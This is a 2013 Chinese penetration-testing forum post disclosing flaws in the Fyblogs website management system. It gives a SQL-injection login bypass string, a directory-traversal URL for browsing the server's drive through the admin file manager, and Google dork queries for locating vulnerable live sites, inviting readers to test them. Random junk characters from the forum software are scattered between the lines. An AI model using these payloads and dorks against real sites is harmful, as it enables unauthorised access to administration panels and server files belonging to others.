中国网络渗透测试联盟
标题:
Fyblogs网站管理系统漏洞
[打印本页]
作者:
admin
时间:
2013-3-7 13:07
标题:
Fyblogs网站管理系统漏洞
漏洞类型: 未授权访问/权限绕过
6 h, h! ?4 w- S+ f: b6 t
$ j0 h5 S6 K% w$ h/ w: ]& D
简要描述:
/ ^ O/ G6 O. R( _+ T6 k
! G7 G) {+ [- [
Fyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
8 b* y! j) d+ k4 l- u W" t
8 J& }: Q6 p& |% p: h
详细说明:
3 y& A U5 D8 q( i2 V9 Z/ y4 h# j- _2 x
7 q# ?! F c) C# d9 Y
后台万能密码 'or'='or'
1 i- [, k+ O- Q( T9 C3 e( J5 \
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
4 ~0 i3 u4 b7 N" h1 ^- |
admin/uploadfile.asp?currentFolder=/upfiles/../
+ c+ g# ~ y4 N& b, ?2 a" X
1 r% Y8 y+ _' Z2 y. t+ ~' b; i* d
漏洞证明:
; `+ K+ d" y2 F l; f
8 ]$ S/ z! ^9 O2 g2 w4 G
谷歌:inurl:type.asp?id=1 新闻中心
A+ ]; o5 Q" e4 V5 K9 W6 o1 m
或者 :inurl:download_ok.asp?
" c8 @9 s; W1 v; \5 y* M& s6 r
0 e- e3 B! @0 U* k' V
可以测试
[% }/ `& o! \1 k, a( B7 @' I
( t- d8 C* m& C& l. f
" {, r4 Z$ S% G1 D7 M! ?
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2